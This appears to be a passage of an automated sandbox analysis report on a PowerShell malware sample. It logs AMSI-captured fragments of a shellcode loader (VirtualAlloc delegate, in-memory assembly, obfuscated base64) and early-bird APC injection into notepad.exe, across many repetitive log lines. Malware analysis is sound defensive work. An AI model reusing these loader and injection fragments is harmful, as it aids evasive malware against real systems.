              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 7.2.notepad.exe.1d114a90000.0.raw.unpack, Messages.cs.Net Code: Memory
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('My
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(@"IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9SdXNoLVBvd2VyU2hlbGwtT2JmdXNjYXRvciwgbWFkZSBieSBEQVJLTjAkWQoKJGRlY29kZWRTY3JpcHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVV

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: 1D114A50000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: 1D12CC50000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4258Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5436Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Windows\System32\notepad.exe TID: 4396Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\notepad.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\notepad.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\notepad.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\System32\notepad.exeJump to behavior
              Hijacks the control flow in another process
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC001B value: E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC0055 value: FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC0093 value: FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC013D value: E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3300 base: 1D112FC0165 value: FFJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\System32\notepad.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0001Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0002Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0003Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0004Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0005Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0006Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0007Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0009Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC000FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0010Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0011Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0012Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0013Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0014Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0015Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0016Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0017Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0018Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0019Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC001FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0020Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0021Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0022Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0023Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0024Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D112FC0025Jump to behavior
